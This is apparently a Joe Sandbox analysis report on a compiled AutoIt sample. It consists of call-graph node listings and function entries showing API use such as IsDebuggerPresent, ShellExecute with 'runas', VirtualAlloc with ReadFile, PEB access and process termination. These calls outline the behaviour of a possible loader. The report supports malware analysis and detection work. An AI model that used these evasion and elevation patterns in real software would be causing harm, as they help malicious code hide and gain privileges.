85962->86105 85965 42c77e 85963->85965 85966 401980 53 API calls 85965->85966 85972 42c796 85966->85972 85967 42c812 86108 46fe32 VariantClear 85967->86108 85969 42c82a InterlockedDecrement 86109 46ff07 54 API calls 85969->86109 85971 42c864 86110 45e737 90 API calls 3 library calls 85971->86110 85972->85967 85972->85971 86107 40ba10 52 API calls 2 library calls 85972->86107 85973 42c9ec 86153 47d33e 338 API calls 85973->86153 85977 42c9fe 86154 46feb1 VariantClear VariantClear 85977->86154 85979 408f40 VariantClear 85989 42c849 85979->85989 85980 42ca08 85981 401b10 52 API calls 85980->85981 85983 42ca15 85981->85983 85982 408f40 VariantClear 85984 42c891 85982->85984 85986 40c2c0 52 API calls 85983->85986 86111 410c60 VariantClear moneypunct 85984->86111 85985 401980 53 API calls 85985->85989 85990 42c874 85986->85990 85988 402780 52 API calls 85988->85989 85989->85973 85989->85979 85989->85985 85989->85988 86112 40a780 85989->86112 85990->85982 85992 42ca59 85990->85992 85992->85992 85994 40afc4 85993->85994 85995 40b156 85993->85995 85996 40afd5 85994->85996 85997 42d1e3 85994->85997 86165 45e737 90 API calls 3 library calls 85995->86165 86002 40a780 201 API calls 85996->86002 86018 40b11a moneypunct 85996->86018 86166 45e737 90 API calls 3 library calls 85997->86166 86000 40b143 86000->84990 86001 42d1f8 86006 408f40 VariantClear 86001->86006 86004 40b00a 86002->86004 86004->86001 86007 40b012 86004->86007 86005 42d4db 86005->86005 86006->86000 86008 40b04a 86007->86008 86010 42d231 VariantClear 86007->86010 86013 40b094 moneypunct 86007->86013 86012 40b05c moneypunct 86008->86012 86167 40e270 VariantClear moneypunct 86008->86167 86009 40b108 86009->86018 86168 40e270 VariantClear moneypunct 86009->86168 86010->86012 86011 42d45a VariantClear 86011->86018 86012->86013 86015 4115d7 52 API calls 86012->86015 86013->86009 86017 42d425 moneypunct 86013->86017 86015->86013 86017->86011 86017->86018 86018->86000 86169 45e737 90 API calls 3 library calls 86018->86169 86020 40900d 86019->86020 86021 408fff 86019->86021 86024 42c3f6 86020->86024 86026 42c44a 86020->86026 86027 40a780 201 API calls 86020->86027 86030 42c47b 86020->86030 86032 42c4cb 86020->86032 86033 42c564 86020->86033 86036 42c548 86020->86036 86039 409112 86020->86039 86041 42c528 86020->86041 86043 4090df 86020->86043 86044 4090ea 86020->86044 86053 4090f2 moneypunct 86020->86053 86172 4534e3 52 API calls 86020->86172 86174 40c4e0 201 API calls 86020->86174 86170 403ea0 52 API calls __cinit 86021->86170 86173 45e737 90 API calls 3 library calls 86024->86173 86175 45e737 90 API calls 3 library calls 86026->86175 86027->86020 86176 451b42 61 API calls 86030->86176 86178 47faae 240 API calls 86032->86178 86037 408f40 VariantClear 86033->86037 86034 42c491 86034->86053 86177 45e737 90 API calls 3 library calls 86034->86177 86181 45e737 90 API calls 3 library calls 86036->86181 86037->86053 86038 42c4da 86038->86053 86179 45e737 90 API calls 3 library calls 86038->86179 86039->86036 86049 40912b 86039->86049 86180 45e737 90 API calls 3 library calls 86041->86180 86043->86044 86047 408e80 VariantClear 86043->86047 86048 408f40 VariantClear 86044->86048 86047->86044 86048->86053 86049->86053 86171 403e10 53 API calls 86049->86171 86051 40914b 86052 408f40 VariantClear 86051->86052 86052->86053 86053->84990 86182 408d90 86054->86182 86056 429778 86211 410c60 VariantClear moneypunct 86056->86211 86058 408cf9 86058->86056 86060 42976c 86058->86060 86062 408d2d 86058->86062 86059 429780 86210 45e737 90 API calls 3 library calls 86060->86210 86198 403d10 86062->86198 86065 408d71 moneypunct 86065->84990 86066 408f40 VariantClear 86067 408d45 moneypunct 86066->86067 86067->86065 86067->86066 86068->84990 86069->84990 86070->84990 86071->84990 86072->84941 86073->84946 86074->84990 86075->84990 86076->84990 86077->84990 86078->84991 86079->84991 86080->84991 86081->84991 86082->84991 86083->84991 86084->84991 86086 403cdf 86085->86086 86087 408f40 VariantClear 86086->86087 86088 403ce7 86087->86088 86088->84985 86089->84991 86090->84991 86091->84990 86092->84938 86094 408e88 86093->86094 86096 408e94 86093->86096 86095 408f40 VariantClear 86094->86095 86095->86096 86097 45340c 86096->86097 86098 453439 86097->86098 86099 453419 86097->86099 86098->85952 86100 45342f 86099->86100 86155 4531b1 85 API calls 5 library calls 86099->86155 86100->85952 86102 453425 86102->85952 86103->85958 86104->85960 86105->85944 86106->85936 86107->85972 86108->85969 86109->85989 86110->85990 86111->85936 86113 40a7a6 86112->86113 86114 40ae8c 86112->86114 86116 4115d7 52 API calls 86113->86116 86156 41130a 51 API calls __cinit 86114->86156 86137 40a7c6 moneypunct _memmove 86116->86137 86117 40a86d 86118 40a878 moneypunct 86117->86118 86119 40abd1 86117->86119 86122 40a884 moneypunct 86118->86122 86128 408f40 VariantClear 86118->86128 86161 45e737 90 API calls 3 library calls 86119->86161 86120 401b10 52 API calls 86120->86137 86122->85989 86123 40bc10 53 API calls 86123->86137 86124 40b5f0 89 API calls 86124->86137 86125 408e80 VariantClear 86125->86137 86126 42b791 VariantClear 86126->86137 86127 42ba2d VariantClear 86127->86137 86128->86118 86129 42bb6a 86164 44b92d VariantClear 86129->86164 86130 42b459 VariantClear 86130->86137 86131 42b6f6 VariantClear 86131->86137 86133 408cc0 194 API calls 86133->86137 86134 42bc5b 86134->85989 86135 40e270 VariantClear 86135->86137 86136 42bbf5 86162 45e737 90 API calls 3 library calls 86136->86162 86137->86117 86137->86119 86137->86120 86137->86123 86137->86124 86137->86125 86137->86126 86137->86127 86137->86129 86137->86130 86137->86131 86137->86133 86137->86135 86137->86136 86138 4115d7 52 API calls 86137->86138 86140 408f40 VariantClear 86137->86140 86144 4115d7 52 API calls 86137->86144 86147 42bc37 86137->86147 86152 4530c9 VariantClear 86137->86152 86157 45308a 53 API calls 86137->86157 86158 470870 52 API calls 86137->86158 86159 457f66 87 API calls __write_nolock 86137->86159 86160 472f47 127 API calls 86137->86160 86141 42b5b3 VariantInit VariantCopy 86138->86141 86140->86137 86141->86137 86143 42b5d7 VariantClear 86141->86143 86143->86137 86144->86137 86163 45e737 90 API calls 3 library calls 86147->86163 86150 42bc48 86150->86129 86151 408f40 VariantClear 86150->86151 86151->86129 86152->86137 86153->85977 86154->85980 86155->86102 86156->86137 86157->86137 86158->86137 86159->86137 86160->86137 86161->86129 86162->86129 86163->86150 86164->86134 86165->85997 86166->86001 86167->86012 86168->86018 86169->86005 86170->86020 86171->86051 86172->86020 86173->86053 86174->86020 86175->86053 86176->86034 86177->86053 86178->86038 86179->86053 86180->86053 86181->86033 86183 4289d2 86182->86183 86184 408db3 86182->86184 86214 45e737 90 API calls 3 library calls 86183->86214 86212 40bec0 90 API calls 86184->86212 86187 4289e5 86215 45e737 90 API calls 3 library calls 86187->86215 86188 408e5a 86188->86058 86191 428a05 86192 408f40 VariantClear 86191->86192 86192->86188 86193 40a780 201 API calls 86194 408dc9 86193->86194 86194->86187 86194->86188 86194->86191 86194->86193 86195 408e64 86194->86195 86197 408f40 VariantClear 86194->86197 86213 40ba10 52 API calls 2 library calls 86194->86213 86196 408f40 VariantClear 86195->86196 86196->86188 86197->86194 86199 408f40 VariantClear 86198->86199 86200 403d20 86199->86200 86201 403cd0 VariantClear 86200->86201 86202 403d4d 86201->86202 86216 45e17d 86202->86216 86226 40de10 86202->86226 86231 467897 86202->86231 86275 4755ad 86202->86275 86278 46e91c 86202->86278 86281 4813fa 86202->86281 86203 403d76 86203->86056 86203->86067 86210->86056 86211->86059 86212->86194 86213->86194 86214->86187 86215->86191 86217 45e198 86216->86217 86218 45e19c 86217->86218 86219 45e1b8 86217->86219 86220 408f40 VariantClear 86218->86220 86221 45e1cc 86219->86221 86222 45e1db FindClose 86219->86222 86223 45e1a4 86220->86223 86224 45e1d9 moneypunct 86221->86224 86291 44ae3e 86221->86291 86222->86224 86223->86203 86224->86203 86227 4115d7 52 API calls 86226->86227 86228 40de23 86227->86228 86229 40da20 CloseHandle 86228->86229 86230 40de2e 86229->86230 86230->86203 86232 4678bb 86231->86232 86233 467954 86232->86233 86235 45340c 85 API calls 86232->86235 86234 4115d7 52 API calls 86233->86234 86263 467964 86233->86263 86236 467989 86234->86236 86238 4678f6 86235->86238 86237 467995 86236->86237 86323 40da60 53 API calls 86236->86323 86304 4533eb 86237->86304 86240 413a0e __wsplitpath 46 API calls 86238->86240 86242 4678fc 86240->86242 86244 401b10 52 API calls 86242->86244 86246 46790c 86244->86246 86320 40d200 52 API calls 2 library calls 86246->86320 86249 4679c7 GetLastError 86252 403cd0 VariantClear 86249->86252 86250 467a05 86253 467a2c 86250->86253 86254 467a4b 86250->86254 86251 467917 86251->86233 86321 4339fa GetFileAttributesW FindFirstFileW FindClose 86251->86321 86255 4679dc 86252->86255 86257 4115d7 52 API calls 86253->86257 86258 4115d7 52 API calls 86254->86258 86259 4679e6 86255->86259 86266 44ae3e CloseHandle 86255->86266 86264 467a31 86257->86264 86265 467a49 86258->86265 86262 408f40 VariantClear 86259->86262 86260 467928 86260->86233 86261 46792f 86260->86261 86322 4335cd 56 API calls 3 library calls 86261->86322 86268 4679ed 86262->86268 86263->86203 86324 436299 52 API calls 2 library calls 86264->86324 86270 408f40 VariantClear 86265->86270 86266->86259 86268->86203 86272 467a88 86270->86272 86271 467939 86271->86233 86273 408f40 VariantClear 86271->86273 86272->86203 86274 467947 86273->86274 86274->86233 86338 475077 86275->86338 86277 4755c0 86277->86203 86439 46e785 86278->86439 86280 46e92f 86280->86203 86282 45340c 85 API calls 86281->86282 86283 481438 86282->86283 86284 402880 95 API calls 86283->86284 86285 48143f 86284->86285 86286 481465 86285->86286 86287 40a780 201 API calls 86285->86287 86289 481469 86286->86289 86500 40e710 53 API calls 86286->86500 86287->86286 86289->86203 86290 4814a4 86290->86203 86292 44ae4b moneypunct 86291->86292 86294 443fdf 86291->86294 86292->86224 86299 40da20 86294->86299 86296 443feb 86303 4340db CloseHandle moneypunct 86296->86303 86298 444001 86298->86292 86300 40da37 86299->86300 86301 40da29 86299->86301 86300->86301 86302 40da3c CloseHandle 86300->86302 86301->86296 86302->86296 86303->86298 86305 453404 86304->86305 86306 4533f8 86304->86306 86308 40de40 86305->86308 86306->86305 86325 4531b1 85 API calls 5 library calls 86306->86325 86309 40da20 CloseHandle 86308->86309 86310 40de4e 86309->86310 86326 40f110 86310->86326 86313 4264fa 86315 40de84 86335 40e080 SetFilePointerEx SetFilePointerEx 86315->86335 86317 40de8b 86336 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86317->86336 86319 40de90 86319->86249 86319->86250 86320->86251 86321->86260 86322->86271 86323->86237 86324->86265 86325->86305 86327 40f125 CreateFileW 86326->86327 86328 42630c 86326->86328 86329 40de74 86327->86329 86328->86329 86330 426311 CreateFileW 86328->86330 86329->86313 86334 40dea0 55 API calls moneypunct 86329->86334 86330->86329 86331 426337 86330->86331 86337 40df90 SetFilePointerEx SetFilePointerEx 86331->86337 86333 426342 86333->86329 86334->86315 86335->86317 86336->86319 86337->86333 86339 4533eb 85 API calls 86338->86339 86340 4750b8 86339->86340 86341 4750ee 86340->86341 86342 475129 86340->86342 86344 408f40 VariantClear 86341->86344 86391 4646e0 86342->86391 86349 4750f5 86344->86349 86345 47515e 86346 475162 86345->86346 86384 47518e 86345->86384 86347 408f40 VariantClear 86346->86347 86378 475169 86347->86378 86348 475357 86350 475365 86348->86350 86351 4754ea 86348->86351 86349->86277 86425 44b3ac 57 API calls 86350->86425 86431 464812 92 API calls 86351->86431 86355 4754fc 86356 475374 86355->86356 86358 475508 86355->86358 86404 430d31 86356->86404 86357 4533eb 85 API calls 86357->86384 86359 408f40 VariantClear 86358->86359 86362 47550f 86359->86362 86362->86378 86363 475388 86411 4577e9 86363->86411 86365 47539e 86419 410cfc 86365->86419 86366 475480 86368 408f40 VariantClear 86366->86368 86368->86378 86370 4753d4 86427 40e830 53 API calls 86370->86427 86371 4753b8 86426 45e737 90 API calls 3 library calls 86371->86426 86374 4753c5 GetCurrentProcess TerminateProcess 86374->86370 86375 4753e3 86389 475406 86375->86389 86428 40cf00 53 API calls 86375->86428 86376 4754b5 86377 408f40 VariantClear 86376->86377 86377->86378 86378->86277 86380 475556 86380->86378 86385 47556e FreeLibrary 86380->86385 86381 4753f8 86429 46c43e 106 API calls 2 library calls 86381->86429 86384->86348 86384->86357 86384->86366 86384->86376 86384->86384 86423 436299 52 API calls 2 library calls 86384->86423 86424 463ad5 64 API calls __wcsicoll 86384->86424 86385->86378 86387 408e80 VariantClear 86387->86389 86389->86380 86389->86387 86390 408f40 VariantClear 86389->86390 86430 40cf00 53 API calls 86389->86430 86432 44b3ac 57 API calls 86389->86432 86433 46c43e 106 API calls 2 library calls 86389->86433 86390->86389 86434 4536f7 53 API calls 86391->86434 86393 4646fc 86435 4426cd 59 API calls _wcslen 86393->86435 86395 464711 86397 40bc70 52 API calls 86395->86397 86403 46474b 86395->86403 86398 46472c 86397->86398 86436 461465 52 API calls _memmove 86398->86436 86400 464741 86401 40c600 52 API calls 86400->86401 86401->86403 86402 464793 86402->86345 86403->86402 86437 463ad5 64 API calls __wcsicoll 86403->86437 86405 430db2 86404->86405 86406 430d54 86404->86406 86405->86363 86407 4115d7 52 API calls 86406->86407 86410 430d74 86407->86410 86408 430da9 86408->86363 86409 4115d7 52 API calls 86409->86410 86410->86408 86410->86409 86412 457a84 86411->86412 86418 45780c _strcat moneypunct _wcslen _wcscpy 86411->86418 86412->86365 86413 443006 57 API calls 86413->86418 86414 45340c 85 API calls 86414->86418 86416 4135bb 46 API calls _malloc 86416->86418 86417 40f6f0 54 API calls 86417->86418 86418->86412 86418->86413 86418->86414 86418->86416 86418->86417 86438 44b3ac 57 API calls 86418->86438 86421 410d11 86419->86421 86420 410da9 VirtualProtect 86422 410d77 86420->86422 86421->86420 86421->86422 86422->86370 86422->86371 86423->86384 86424->86384 86425->86356 86426->86374 86427->86375 86428->86381 86429->86389 86430->86389 86431->86355 86432->86389 86433->86389 86434->86393 86435->86395 86436->86400 86437->86402 86438->86418 86440 46e7a2 86439->86440 86441 4115d7 52 API calls 86440->86441 86443 46e802 86440->86443 86442 46e7ad 86441->86442 86445 46e7b9 86442->86445 86487 40da60 53 API calls 86442->86487 86444 46e7e5 86443->86444 86452 46e82f 86443->86452 86447 408f40 VariantClear 86444->86447 86448 4533eb 85 API calls 86445->86448 86449 46e7ea 86447->86449 86450 46e7ca 86448->86450 86449->86280 86453 40de40 60 API calls 86450->86453 86451 46e8b5 86480 4680ed 86451->86480 86452->86451 86454 46e845 86452->86454 86455 46e7d7 86453->86455 86458 4533eb 85 API calls 86454->86458 86455->86452 86459 46e7db 86455->86459 86457 46e8bb 86484 443fbe 86457->86484 86467 46e84b 86458->86467 86459->86444 86461 44ae3e CloseHandle 86459->86461 86460 46e87a 86488 4689f4 59 API calls 86460->86488 86461->86444 86464 46e883 86489 4013c0 52 API calls 86464->86489 86467->86460 86467->86464 86468 46e88f 86470 40e0a0 52 API calls 86468->86470 86469 408f40 VariantClear 86478 46e881 86469->86478 86471 46e899 86470->86471 86490 40d200 52 API calls 2 library calls 86471->86490 86473 46e911 86473->86280 86474 46e8a5 86491 4689f4 59 API calls 86474->86491 86475 40da20 CloseHandle 86477 46e903 86475->86477 86479 44ae3e CloseHandle 86477->86479 86478->86473 86478->86475 86479->86473 86481 468100 86480->86481 86482 4680fa 86480->86482 86481->86457 86492 467ac4 55 API calls 2 library calls 86482->86492 86493 443e36 86484->86493 86486 443fd3 86486->86469 86486->86478 86487->86445 86488->86478 86489->86468 86490->86474 86491->86478 86492->86481 86496 443e19 86493->86496 86497 443e26 86496->86497 86498 443e32 WriteFile 86496->86498 86499 443db4 SetFilePointerEx SetFilePointerEx 86497->86499 86498->86486 86499->86498 86500->86290 86501 42d154 86505 480a8d 86501->86505 86503 42d161 86504 480a8d 201 API calls 86503->86504 86504->86503 86506 480ae4 86505->86506 86507 480b26 86505->86507 86508 480aeb 86506->86508 86509 480b15 86506->86509 86510 40bc70 52 API calls 86507->86510 86511 480aee 86508->86511 86512 480b04 86508->86512 86538 4805bf 201 API calls 86509->86538 86529 480b2e 86510->86529 86511->86507 86514 480af3 86511->86514 86537 47fea2 201 API calls __itow_s 86512->86537 86536 47f135 201 API calls 86514->86536 86516 40e0a0 52 API calls 86516->86529 86519 408f40 VariantClear 86521 481156 86519->86521 86520 480aff 86520->86519 86522 408f40 VariantClear 86521->86522 86523 48115e 86522->86523 86523->86503 86524 40e710 53 API calls 86524->86529 86525 401980 53 API calls 86525->86529 86527 40c2c0 52 API calls 86527->86529 86528 40a780 201 API calls 86528->86529 86529->86516 86529->86520 86529->86524 86529->86525 86529->86527 86529->86528 86531 408e80 VariantClear 86529->86531 86534 480ff5 86529->86534 86539 45377f 52 API calls 86529->86539 86540 45e951 53 API calls 86529->86540 86541 40e830 53 API calls 86529->86541 86542 47925f 53 API calls 86529->86542 86543 47fcff 201 API calls 86529->86543 86531->86529 86544 45e737 90 API calls 3 library calls 86534->86544 86536->86520 86537->86520 86538->86520 86539->86529 86540->86529 86541->86529 86542->86529 86543->86529 86544->86520 86545 4198c10 86559 4196860 86545->86559 86547 4198cdf 86563 4198b00 86547->86563 86549 4198d08 CreateFileW 86551 4198d5c 86549->86551 86552 4198d57 86549->86552 86551->86552 86553 4198d73 VirtualAlloc 86551->86553 86553->86552 86554 4198d91 ReadFile 86553->86554 86554->86552 86555 4198dac 86554->86555 86556 4197b00 13 API calls 86555->86556 86557 4198ddf 86556->86557 86558 4198e02 ExitProcess 86557->86558 86558->86552 86560 41968c6 86559->86560 86566 4199d10 GetPEB 86560->86566 86562 4196eeb 86562->86547 86564 4198b09 Sleep 86563->86564 86565 4198b17 86564->86565 86567 4199d3a 86566->86567 86567->86562 86568 425b2b 86573 40f000 86568->86573 86572 425b3a 86574 4115d7 52 API calls 86573->86574 86575 40f007 86574->86575 86576 4276ea 86575->86576 86582 40f030 86575->86582 86581 41130a 51 API calls __cinit 86581->86572 86583 40f039 86582->86583 86584 40f01a 86582->86584 86612 41130a 51 API calls __cinit 86583->86612 86586 40e500 86584->86586 86587 40bc70 52 API calls 86586->86587 86588 40e515 GetVersionExW 86587->86588 86589 402160 52 API calls 86588->86589 86590 40e557 86589->86590 86613 40e660 86590->86613 86595 427674 86600 4276c6 GetSystemInfo 86595->86600 86598 40e5e0 86602 4276d5 GetSystemInfo 86598->86602 86627 40efd0 86598->86627 86599 40e5cd GetCurrentProcess 86634 40ef20 LoadLibraryA GetProcAddress 86599->86634 86600->86602 86605 40e629 86631 40ef90 86605->86631 86608 40e641 FreeLibrary 86609 40e644 86608->86609 86610 40e653 FreeLibrary 86609->86610 86611 40e656 86609->86611 86610->86611 86611->86581 86612->86584 86614 40e667 86613->86614 86615 42761d 86614->86615 86616 40c600 52 API calls 86614->86616 86617 40e55c 86616->86617 86618 40e680 86617->86618 86619 40e687 86618->86619 86620 427616 86619->86620 86621 40c600 52 API calls 86619->86621 86622 40e566 86621->86622 86622->86595 86623 40ef60 86622->86623 86624 40e5c8 86623->86624 86625 40ef66 LoadLibraryA 86623->86625 86624->86598 86624->86599 86625->86624 86626 40ef77 GetProcAddress 86625->86626 86626->86624 86628 40e620 86627->86628 86629 40efd6 LoadLibraryA 86627->86629 86628->86600 86628->86605 86629->86628 86630 40efe7 GetProcAddress 86629->86630 86630->86628 86635 40efb0 LoadLibraryA GetProcAddress 86631->86635 86633 40e632 GetNativeSystemInfo 86633->86608 86633->86609 86634->86598 86635->86633 86636 425b5e 86641 40c7f0 86636->86641 86640 425b6d 86676 40db10 52 API calls 86641->86676 86643 40c82a 86677 410ab0 6 API calls 86643->86677 86645 40c86d 86646 40bc70 52 API calls 86645->86646 86647 40c877 86646->86647 86648 40bc70 52 API calls 86647->86648 86649 40c881 86648->86649 86650 40bc70 52 API calls 86649->86650 86651 40c88b 86650->86651 86652 40bc70 52 API calls 86651->86652 86653 40c8d1 86652->86653 86654 40bc70 52 API calls 86653->86654 86655 40c991 86654->86655 86678 40d2c0 52 API calls 86655->86678 86657 40c99b 86679 40d0d0 53 API calls 86657->86679 86659 40c9c1 86660 40bc70 52 API calls 86659->86660 86661 40c9cb 86660->86661 86680 40e310 53 API calls 86661->86680 86663 40ca28 86664 408f40 VariantClear 86663->86664 86665 40ca30 86664->86665 86666 408f40 VariantClear 86665->86666 86667 40ca38 GetStdHandle 86666->86667 86668 429630 86667->86668 86669 40ca87 86667->86669 86668->86669 86670 429639 86668->86670 86675 41130a 51 API calls __cinit 86669->86675 86681 4432c0 57 API calls 86670->86681 86672 429641 86682 44b6ab CreateThread 86672->86682 86674 42964f CloseHandle 86674->86669 86675->86640 86676->86643 86677->86645 86678->86657 86679->86659 86680->86663 86681->86672 86682->86674 86683 44b5cb 58 API calls 86682->86683 86684 425b6f 86689 40dc90 86684->86689 86688 425b7e 86690 40bc70 52 API calls 86689->86690 86691 40dd03 86690->86691 86697 40f210 86691->86697 86694 40dd96 86695 40ddb7 86694->86695 86700 40dc00 52 API calls 2 library calls 86694->86700 86696 41130a 51 API calls __cinit 86695->86696 86696->86688 86701 40f250 RegOpenKeyExW 86697->86701 86699 40f230 86699->86694 86700->86694 86702 425e17 86701->86702 86703 40f275 RegQueryValueExW 86701->86703 86702->86699 86704 40f2c3 RegCloseKey 86703->86704 86705 40f298 86703->86705 86704->86699 86706 40f2a9 RegCloseKey 86705->86706 86707 425e1d 86705->86707 86706->86699

                                                                          Executed Functions

                                                                          Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                          Strings
                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                          • API String ID: 2495805114-3383388033
                                                                          • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                          • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                          Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1021 427693-427696 1015->1021 1022 427688-427691 1015->1022 1020 4276b4-4276be 1016->1020 1023 427625-427629 1017->1023 1024 40e59c-40e59f 1017->1024 1035 40e5ec-40e60c 1018->1035 1036 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1036 1037 4276c6-4276ca GetSystemInfo 1020->1037 1021->1020 1025 427698-4276a8 1021->1025 1022->1020 1027 427636-427640 1023->1027 1028 42762b-427631 1023->1028 1029 40e5a5-40e5ae 1024->1029 1030 427654-427657 1024->1030 1033 4276b0 1025->1033 1034 4276aa-4276ae 1025->1034 1027->1018 1028->1018 1031 40e5b4 1029->1031 1032 427645-42764f 1029->1032 1030->1018 1038 42765d-42766f 1030->1038 1031->1018 1032->1018 1033->1020 1034->1020 1040 40e612-40e623 call 40efd0 1035->1040 1041 4276d5-4276df GetSystemInfo 1035->1041 1036->1035 1047 40e5e8 1036->1047 1037->1041 1038->1018 1040->1037 1046 40e629-40e63f call 40ef90 GetNativeSystemInfo 1040->1046 1050 40e641-40e642 FreeLibrary 1046->1050 1051 40e644-40e651 1046->1051 1047->1035 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
